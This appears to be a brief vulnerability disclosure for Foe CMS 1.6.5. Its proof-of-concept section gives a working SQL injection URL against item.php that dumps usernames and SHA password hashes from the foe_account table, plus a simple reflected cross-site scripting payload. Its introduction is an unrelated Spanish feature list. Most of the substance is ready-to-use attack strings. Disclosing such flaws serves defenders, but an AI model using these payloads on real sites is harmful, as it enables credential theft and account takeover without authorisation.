56 lines
No EOL
1 KiB
Text
56 lines
No EOL
1 KiB
Text
Title: Foe CMS 1.6.5 SQL Injection Vulnerability
|
|
Vendor: http://foecms.com/
|
|
Download: http://code.google.com/p/foecms/downloads/list
|
|
Versions: 1.6.5
|
|
Platform: linux, windows
|
|
Bug: SQL Injection | Cross Site Scripting
|
|
|
|
|
|
|
|
-------------------------------------------------------
|
|
|
|
1) Introduction
|
|
2) Bug
|
|
3) Proof of concept
|
|
4) Credits
|
|
|
|
|
|
===========
|
|
1) Introduction
|
|
===========
|
|
|
|
Gestor de categorias (Como phpbb3)
|
|
Pasar a php orientado a objetos
|
|
account_meta para firma, ocupacion, avatar, etc (como wordpress) permite añadir y quitar campos a gusto
|
|
Permisos segun rangos para TODO
|
|
Pagina del UCP para cambiar los permisos de acceso (amigos y eso)
|
|
|
|
|
|
======
|
|
2) Bug
|
|
======
|
|
|
|
SQL Injection
|
|
http://victim/[path]/item.php?ei=[SQLi]
|
|
|
|
Cross Site Scripting
|
|
http://victim/[path]/item.php?ei=[XSS]
|
|
|
|
|
|
=====
|
|
3)proof of concept
|
|
=====
|
|
|
|
Example SQLi
|
|
http://victim/[path]/item.php?ei=-1 union select 1,username,pass_sha,1,1,1,1,1,1 from foe_account--
|
|
|
|
Example XSS
|
|
http://victim/[path]/item.php?ei=<script>alert(1)</script>
|
|
|
|
|
|
=====
|
|
4)Credits
|
|
=====
|
|
|
|
flux77
|
|
Contact : 0xflux77 at gmail.com |